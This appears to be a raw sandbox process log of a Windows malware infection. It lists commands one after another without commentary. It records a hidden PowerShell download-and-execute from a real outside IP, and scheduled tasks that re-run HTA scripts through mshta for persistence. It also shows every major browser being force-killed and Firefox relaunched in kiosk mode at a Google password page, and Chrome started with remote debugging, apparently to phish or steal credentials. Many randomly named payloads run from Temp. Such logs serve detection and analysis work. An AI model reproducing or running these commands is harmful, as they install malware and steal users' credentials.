"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe

"C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn omjqOma5spW /tr "mshta C:\Users\Admin\AppData\Local\Temp\B9yFyWSkE.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\B9yFyWSkE.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn omjqOma5spW /tr "mshta C:\Users\Admin\AppData\Local\Temp\B9yFyWSkE.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" any_word

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE

"C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "agtOVmaI20Q" /tr "mshta \"C:\Temp\ub5C3wgKQ.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ub5C3wgKQ.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

"C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"

C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe

"C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe"

C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe

"C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 27194 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee3f8a06-3edb-4beb-9d7e-6ba1df0a2a9a} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2384 -prefsLen 28114 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29fb8f36-6011-47b5-b8e0-6e34d3384cb0} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3000 -childID 1 -isForBrowser -prefsHandle 3064 -prefMapHandle 3092 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {714b3b59-202d-4fed-91a3-0cec2686cfe9} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3964 -childID 2 -isForBrowser -prefsHandle 3956 -prefMapHandle 3948 -prefsLen 32604 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63de17a2-08e4-4b5e-a44f-1922e05f74a0} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4904 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4900 -prefMapHandle 4896 -prefsLen 32604 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86d685ef-179c-4f4e-886f-512dd2a22bca} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" utility

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\rsxrj\oqftxb.exe

C:\ProgramData\rsxrj\oqftxb.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5400 -prefMapHandle 5396 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2837010c-4282-4023-b695-2dabc3d1c234} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5540 -prefMapHandle 5544 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83f6b1c6-6a04-44f0-b6fc-ebc858774fe8} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5728 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5832 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffb078e2-5028-4de4-b43e-01601688392b} 4168 "\\.\pipe\gecko-crash-server-pipe.4168" tab

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe

"C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe"

C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe

"C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe"

C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe

"C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe

"C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe"

C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6104 -ip 6104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 796

C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1012 -ip 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 792

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1708 -ip 1708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 800

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe15acc40,0x7fffe15acc4c,0x7fffe15acc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1908,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2320 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4476,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4564 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4740 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4940 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

